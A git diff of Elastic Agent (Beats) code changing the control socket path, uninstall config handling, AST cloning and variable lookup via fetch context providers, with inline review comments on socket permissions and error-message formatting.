a/x-pack/elastic-agent/pkg/agent/control/addr.go 
+++ b/x-pack/elastic-agent/pkg/agent/control/addr.go @@ -9,6 +9,7 @@ package control import ( "crypto/sha256" "fmt" + "path/filepath" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" @@ -21,9 +22,12 @@ func Address() string { return paths.SocketPath } - // not install, adjust the path based on data path - data := paths.Data() - // entire string cannot be longer than 107 characters, this forces the - // length to always be 88 characters (but unique per data path) - return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(data))) + // unix socket path must be less than 104 characters + path := fmt.Sprintf("unix://%s.sock", filepath.Join(paths.TempDir(), "elastic-agent-control")) + if len(path) < 104 { + return path + } + // place in global /tmp to ensure that its small enough to fit; current path is way to long + // for it to be used, but needs to be unique per Agent (in the case that multiple are running) + return fmt.Sprintf(`unix:///tmp/elastic-agent-%x.sock`, sha256.Sum256([]byte(path))) } diff --git a/x-pack/elastic-agent/pkg/agent/control/client/client.go b/x-pack/elastic-agent/pkg/agent/control/client/client.go index 5e55fce9349..3709a834a77 100644 --- a/x-pack/elastic-agent/pkg/agent/control/client/client.go +++ b/x-pack/elastic-agent/pkg/agent/control/client/client.go @@ -78,12 +78,10 @@ type Client interface { // client manages the state and communication to the Elastic Agent. type client struct { - ctx context.Context - cancel context.CancelFunc - wg sync.WaitGroup - client proto.ElasticAgentControlClient - cfgLock sync.RWMutex - obsLock sync.RWMutex + ctx context.Context + cancel context.CancelFunc + wg sync.WaitGroup + client proto.ElasticAgentControlClient } // New creates a client connection to Elastic Agent. 
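Review bot: When the temp-dir path is too long, `Address` falls back to `unix:///tmp/elastic-agent-%x.sock`, a predictable name in the shared `/tmp`, so protection of the control socket then rests entirely on how the listener creates and permissions that file, which this hunk does not show. I would state that requirement next to the fallback, e.g. `// fallback lives in shared /tmp: the listener must create the socket owner-only and refuse a pre-existing path it does not own`, and check that the server side does so. The `len(path) < 104` test also counts the seven-character `unix://` prefix, so it is stricter than the limit the comment cites; that is harmless but worth saying in the comment. The start of `Address` is outside the hunk.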
diff --git a/x-pack/elastic-agent/pkg/agent/control/control_test.go b/x-pack/elastic-agent/pkg/agent/control/control_test.go index bcda4a0e4ed..b37a161047f 100644 --- a/x-pack/elastic-agent/pkg/agent/control/control_test.go +++ b/x-pack/elastic-agent/pkg/agent/control/control_test.go @@ -72,7 +72,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/agent/install/uninstall.go b/x-pack/elastic-agent/pkg/agent/install/uninstall.go index 4601585416e..6a60a2c9258 100644 --- a/x-pack/elastic-agent/pkg/agent/install/uninstall.go +++ b/x-pack/elastic-agent/pkg/agent/install/uninstall.go @@ -34,6 +34,11 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) +const ( + inputsKey = "inputs" + outputsKey = "outputs" +) + // Uninstall uninstalls persistently Elastic Agent on the system. func Uninstall(cfgFile string) error { // uninstall the current service @@ -119,12 +124,12 @@ func delayedRemoval(path string) { } func uninstallPrograms(ctx context.Context, cfgFile string) error { - log, err := logger.NewWithLogpLevel("", logp.ErrorLevel) + log, err := logger.NewWithLogpLevel("", logp.ErrorLevel, false) if err != nil { return err } - cfg, err := operations.LoadFullAgentConfig(cfgFile) + cfg, err := operations.LoadFullAgentConfig(cfgFile, false) if err != nil { return err } @@ -139,6 +144,11 @@ func uninstallPrograms(ctx context.Context, cfgFile string) error { return err } + // nothing to remove + if len(pp) == 0 { + return nil + } + uninstaller, err := uninstall.NewUninstaller() if err != nil { return err 
@@ -165,6 +175,17 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { if err != nil { return nil, errors.New("failed to create a map from config", err) } + + // if no input is defined nothing to remove + if _, found := mm[inputsKey]; !found { + return nil, nil + } + + // if no output is defined nothing to remove + if _, found := mm[outputsKey]; !found { + return nil, nil + } + ast, err := transpiler.NewAST(mm) if err != nil { return nil, errors.New("failed to create a ast from config", err) @@ -176,6 +197,9 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { } ppMap, err := program.Programs(agentInfo, ast) + if err != nil { + return nil, errors.New("failed to get programs from config", err) + } var pp []program.Program check := make(map[string]bool) @@ -196,6 +220,10 @@ func programsFromConfig(cfg *config.Config) ([]program.Program, error) { func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) (*config.Config, error) { cfgMap, err := cfg.ToMapStr() + if err != nil { + return nil, err + } + ast, err := transpiler.NewAST(cfgMap) if err != nil { return nil, err @@ -204,7 +232,7 @@ func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) // apply dynamic inputs inputs, ok := transpiler.Lookup(ast, "inputs") if ok { - varsArray := make([]*transpiler.Vars, 0, 0) + varsArray := make([]*transpiler.Vars, 0) var wg sync.WaitGroup wg.Add(1) varsCallback := func(vv []*transpiler.Vars) { @@ -246,5 +274,9 @@ func applyDynamics(ctx context.Context, log *logger.Logger, cfg *config.Config) } finalConfig, err := newAst.Map() + if err != nil { + return nil, err + } + return config.NewConfigFrom(finalConfig) } diff --git a/x-pack/elastic-agent/pkg/agent/operation/common_test.go b/x-pack/elastic-agent/pkg/agent/operation/common_test.go index 2ec6b531456..4eb24a105d3 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/common_test.go 
+++ b/x-pack/elastic-agent/pkg/agent/operation/common_test.go @@ -92,7 +92,7 @@ func getTestOperator(t *testing.T, downloadPath string, installPath string, p *a func getLogger() *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - l, _ := logger.NewFromConfig("", loggerCfg) + l, _ := logger.NewFromConfig("", loggerCfg, false) return l } @@ -129,7 +129,7 @@ func waitFor(t *testing.T, check func() error) { if err == nil { return } - if time.Now().Sub(started) >= 15*time.Second { + if time.Since(started) >= 15*time.Second { t.Fatalf("check timed out after 15 second: %s", err) } time.Sleep(10 * time.Millisecond) diff --git a/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go b/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go deleted file mode 100644 index f2254293446..00000000000 --- a/x-pack/elastic-agent/pkg/agent/operation/operation_remove.go +++ /dev/null 
@@ -1,42 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package operation - -import ( - "context" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" -) - -// operationRemove uninstall and removes all the bits related to the artifact -type operationRemove struct { -} - -func newOperationRemove() *operationRemove { - return &operationRemove{} -} - -// Name is human readable name identifying an operation -func (o *operationRemove) Name() string { - return "operation-remove" -} - -// Check checks whether remove needs to run. -// -// Always returns false. -func (o *operationRemove) Check(_ context.Context, _ Application) (bool, error) { - return false, nil -} - -// Run runs the operation -func (o *operationRemove) Run(ctx context.Context, application Application) (err error) { - defer func() { - if err != nil { - application.SetState(state.Failed, err.Error(), nil) - } - }() - - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator.go b/x-pack/elastic-agent/pkg/agent/operation/operator.go index a0416545b11..35b9a6731b1 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator.go @@ -152,7 +152,7 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { o.statusController.UpdateStateID(stateID) for _, step := range steps { - if strings.ToLower(step.ProgramSpec.Cmd) != strings.ToLower(monitoringName) { + if !strings.EqualFold(step.ProgramSpec.Cmd, monitoringName) { if _, isSupported := program.SupportedMap[strings.ToLower(step.ProgramSpec.Cmd)]; !isSupported { // mark failed, new config cannot be run msg := fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd) 
@@ -344,8 +344,3 @@ func (o *Operator) deleteApp(p Descriptor) { o.logger.Debugf("operator is removing %s from app collection: %v", p.ID(), o.apps) delete(o.apps, id) } - -func isMonitorable(descriptor Descriptor) bool { - isSidecar := app.IsSidecar(descriptor) - return !isSidecar // everything is monitorable except sidecar -} diff --git a/x-pack/elastic-agent/pkg/agent/program/spec.go b/x-pack/elastic-agent/pkg/agent/program/spec.go index f7d81b74a7e..98e539d2007 100644 --- a/x-pack/elastic-agent/pkg/agent/program/spec.go +++ b/x-pack/elastic-agent/pkg/agent/program/spec.go @@ -32,6 +32,7 @@ type Spec struct { Cmd string `yaml:"cmd"` Args []string `yaml:"args"` Artifact string `yaml:"artifact"` + ActionInputTypes []string `yaml:"action_input_types,omitempty"` LogPaths map[string]string `yaml:"log_paths,omitempty"` MetricEndpoints map[string]string `yaml:"metric_endpoints,omitempty"` Rules *transpiler.RuleList `yaml:"rules"` diff --git a/x-pack/elastic-agent/pkg/agent/program/supported.go b/x-pack/elastic-agent/pkg/agent/program/supported.go index f584060e1d3..26e4368897e 100644 --- a/x-pack/elastic-agent/pkg/agent/program/supported.go +++ b/x-pack/elastic-agent/pkg/agent/program/supported.go 
@@ -23,8 +23,9 @@ func init() { // spec/fleet-server.yml // spec/heartbeat.yml // spec/metricbeat.yml + // spec/osquerybeat.yml // spec/packetbeat.yml - unpacked := packer.MustUnpack("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") + unpacked := packer.MustUnpack("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") SupportedMap = make(map[string]Spec) for f, v := range unpacked { diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml index fb585dae996..006db1e9f52 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml @@ -40,6 +40,8 @@ inputs: use_output: default streams: - metricset: status + processors: + - null data_stream: dataset: docker.status - metricset: info diff --git a/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go b/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go index 2491a66d4a0..93f01d89ec8 100644 --- a/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go +++ b/x-pack/elastic-agent/pkg/agent/stateresolver/resolve.go 
@@ -27,8 +27,6 @@ const ( unchangedState // UNCHANGED ) -type id string - // state represent the SHOULD state of the system, contains a reference to the actual bundle of // configuration received by the upstream call and keep track of the last change executed on a program. // diff --git a/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go b/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go index e1c83c7409d..e1adea3281a 100644 --- a/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go +++ b/x-pack/elastic-agent/pkg/agent/stateresolver/stateresolver_test.go @@ -25,7 +25,7 @@ func TestStateResolverAcking(t *testing.T) { } t.Run("when we ACK the should state", func(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) r, err := NewStateResolver(log) require.NoError(t, err) @@ -38,13 +38,13 @@ func TestStateResolverAcking(t *testing.T) { ack() // Current sate is not empty lets try to resolve the same configuration. - _, _, steps, ack, err = r.Resolve(submit) + _, _, steps, _, err = r.Resolve(submit) require.NoError(t, err) require.Equal(t, 0, len(steps)) }) t.Run("when we don't ACK the should state", func(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) r, err := NewStateResolver(log) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/agent/storage/storage.go b/x-pack/elastic-agent/pkg/agent/storage/storage.go index 2ff2d7250f1..a578edb1dfd 100644 --- a/x-pack/elastic-agent/pkg/agent/storage/storage.go +++ b/x-pack/elastic-agent/pkg/agent/storage/storage.go @@ -26,10 +26,6 @@ type Store interface { Save(io.Reader) error } -type load interface { - Load() (io.ReadCloser, error) -} - // NullStore this is only use to split the work into multiples PRs. type NullStore struct{} diff --git a/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go b/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go index 6f5fbe4046a..bf9cca915f8 100644 
--- a/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go +++ b/x-pack/elastic-agent/pkg/agent/storage/store/action_store_test.go @@ -18,7 +18,7 @@ import ( ) func TestActionStore(t *testing.T) { - log, _ := logger.New("action_store") + log, _ := logger.New("action_store", false) withFile := func(fn func(t *testing.T, file string)) func(*testing.T) { return func(t *testing.T) { dir, err := ioutil.TempDir("", "action-store") diff --git a/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go b/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go index 1b575599dd3..d19f4b1b453 100644 --- a/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go +++ b/x-pack/elastic-agent/pkg/agent/storage/store/state_store_test.go @@ -31,7 +31,7 @@ func TestStateStore(t *testing.T) { } func runTestStateStore(t *testing.T, ackToken string) { - log, _ := logger.New("state_store") + log, _ := logger.New("state_store", false) withFile := func(fn func(t *testing.T, file string)) func(*testing.T) { return func(t *testing.T) { dir, err := ioutil.TempDir("", "state-store") diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go index cfb02d1660a..13242297c9a 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go @@ -126,7 +126,11 @@ func (d *Dict) Value() interface{} { func (d *Dict) Clone() Node { nodes := make([]Node, 0, len(d.value)) for _, i := range d.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) + } return &Dict{value: nodes} } @@ -350,6 +354,9 @@ func (l *List) Value() interface{} { func (l *List) Clone() Node { nodes := make([]Node, 0, len(l.value)) for _, i := range l.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) } return &List{value: nodes} 
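Review bot: The new `if i == nil { continue }` guards in `Dict.Clone` and `List.Clone` carry no comment saying where nil children come from, and they make the clone silently shorter than the node it was cloned from. A one-line why-comment would help, for example `// a null YAML item (e.g. "processors: [null]") yields a nil child; drop it instead of panicking`, assuming that is the case the `single_config.yml` change in this commit exercises. The check only catches an untyped nil interface, so a typed nil pointer stored as a `Node` would still reach `i.Clone()`. Other methods that iterate `d.value` and `l.value` are outside these hunks and may need the same guard.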
@@ -611,7 +618,7 @@ func (s *BoolVal) Find(key string) (Node, bool) { } func (s *BoolVal) String() string { - if s.value == true { + if s.value { return "true" } return "false" @@ -1077,7 +1084,7 @@ func Insert(a *AST, node Node, to Selector) error { // to create 2 different sub AST and want to merge them together again. func Combine(a, b *AST) (*AST, error) { newAST := &AST{} - if reflect.TypeOf(b.root) != reflect.TypeOf(b.root) { + if reflect.TypeOf(a.root) != reflect.TypeOf(b.root) { return nil, fmt.Errorf("incompatible node type to combine, received %T and %T", a, b) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go index 4c56b993e64..46565756d8f 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast_test.go @@ -1616,7 +1616,7 @@ func TestHash(t *testing.T) { } func mustMakeVars(mapping map[string]interface{}) *Vars { - v, err := NewVars(mapping) + v, err := NewVars(mapping, nil) if err != nil { panic(err) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/rules.go b/x-pack/elastic-agent/pkg/agent/transpiler/rules.go index 42acd53d21a..4fec7c78032 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/rules.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/rules.go @@ -953,7 +953,7 @@ func (r *TranslateWithRegexpRule) Apply(_ AgentInfo, ast *AST) error { return fmt.Errorf("cannot rename, invalid type expected 'Key' received '%T'", node) } - candidate, ok := n.value.(Node).Value().(string) + candidate, ok := n.value.Value().(string) if !ok { return fmt.Errorf("cannot filter on value expected 'string' and received %T", candidate) } @@ -1170,7 +1170,7 @@ func (r *FilterValuesRule) Apply(_ AgentInfo, ast *AST) error { } for _, v := range r.Values { - if v == n.value.(Node).Value() { + if v == n.value.Value() { newNodes = append(newNodes, item) break } 
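Review bot: The error returned by `Combine` still formats `a` and `b`, which are both `*AST`, so the message reports the same type twice and never shows the node types that actually differed. Now that the comparison is correctly `a.root` against `b.root`, the message should match: `return nil, fmt.Errorf("incompatible node type to combine, received %T and %T", a.root, b.root)`. The rest of `Combine` is outside the hunk.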
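Review bot: In `TranslateWithRegexpRule.Apply`, `candidate` is the zero-value `string` whenever the assertion fails, so `%T` in the error always prints `string` and hides the type that was actually received. Format the source value instead: `return fmt.Errorf("cannot filter on value expected 'string' and received %T", n.value.Value())`. The same pattern appears in the `FilterValuesWithRegexpRule.Apply` hunk further down. Both function bodies extend outside their hunks.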
@@ -1282,7 +1282,7 @@ func (r *FilterValuesWithRegexpRule) Apply(_ AgentInfo, ast *AST) error { continue } - candidate, ok := n.value.(Node).Value().(string) + candidate, ok := n.value.Value().(string) if !ok { return fmt.Errorf("cannot filter on value expected 'string' and received %T", candidate) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go b/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go index f94c87f6499..0de58a56d73 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/utils_test.go @@ -737,7 +737,7 @@ func TestRenderInputs(t *testing.T) { } func mustMakeVarsP(mapping map[string]interface{}, processorKey string, processors Processors) *Vars { - v, err := NewVarsWithProcessors(mapping, processorKey, processors) + v, err := NewVarsWithProcessors(mapping, processorKey, processors, nil) if err != nil { panic(err) } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/vars.go b/x-pack/elastic-agent/pkg/agent/transpiler/vars.go index 698847edd16..e1818cdd160 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/vars.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/vars.go @@ -9,6 +9,10 @@ import ( "regexp" "strings" "unicode" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" + + "github.com/elastic/beats/v7/libbeat/common" ) var varsRegex = regexp.MustCompile(`\${([\p{L}\d\s\\\-_|.'"]*)}`) 
@@ -18,23 +22,24 @@ var ErrNoMatch = fmt.Errorf("no matching vars") // Vars is a context of variables that also contain a list of processors that go with the mapping. type Vars struct { - tree *AST - processorsKey string - processors Processors + tree *AST + processorsKey string + processors Processors + fetchContextProviders common.MapStr } // NewVars returns a new instance of vars. -func NewVars(mapping map[string]interface{}) (*Vars, error) { - return NewVarsWithProcessors(mapping, "", nil) +func NewVars(mapping map[string]interface{}, fetchContextProviders common.MapStr) (*Vars, error) { + return NewVarsWithProcessors(mapping, "", nil, fetchContextProviders) } // NewVarsWithProcessors returns a new instance of vars with attachment of processors. -func NewVarsWithProcessors(mapping map[string]interface{}, processorKey string, processors Processors) (*Vars, error) { +func NewVarsWithProcessors(mapping map[string]interface{}, processorKey string, processors Processors, fetchContextProviders common.MapStr) (*Vars, error) { tree, err := NewAST(mapping) if err != nil { return nil, err } - return &Vars{tree, processorKey, processors}, nil + return &Vars{tree, processorKey, processors, fetchContextProviders}, nil } // Replace returns a new value based on variable replacement. @@ -44,7 +49,6 @@ func (v *Vars) Replace(value string) (Node, error) { if !validBrackets(value, matchIdxs) { return nil, fmt.Errorf("starting ${ is missing ending }") } - result := "" lastIndex := 0 for _, r := range matchIdxs { @@ -60,7 +64,7 @@ func (v *Vars) Replace(value string) (Node, error) { result += value[lastIndex:r[0]] + val.Value() set = true case *varString: - node, ok := Lookup(v.tree, val.Value()) + node, ok := v.lookupNode(val.Value()) if ok { node := nodeToValue(node) if v.processorsKey != "" && varPrefixMatched(val.Value(), v.processorsKey) { 
@@ -90,14 +94,34 @@ func (v *Vars) Replace(value string) (Node, error) { // Lookup returns the value from the vars. func (v *Vars) Lookup(name string) (interface{}, bool) { + // lookup in the AST tree return v.tree.Lookup(name) } +// lookupNode performs a lookup on the AST, but keeps the result as a `Node`. +// +// This is different from `Lookup` which returns the actual type, not the AST type. +func (v *Vars) lookupNode(name string) (Node, bool) { + // check if the value can be retrieved from a FetchContextProvider + for providerName, provider := range v.fetchContextProviders { + if varPrefixMatched(name, providerName) { + fetchProvider := provider.(composable.FetchContextProvider) + fval, found := fetchProvider.Fetch(name) + if found { + return &StrVal{value: fval}, true + } + return &StrVal{value: ""}, false + } + } + // lookup in the AST tree + return Lookup(v.tree, name) +} + // nodeToValue ensures that the node is an actual value. func nodeToValue(node Node) Node { switch n := node.(type) { case *Key: - return n.value.(Node) + return n.value } return node } diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go 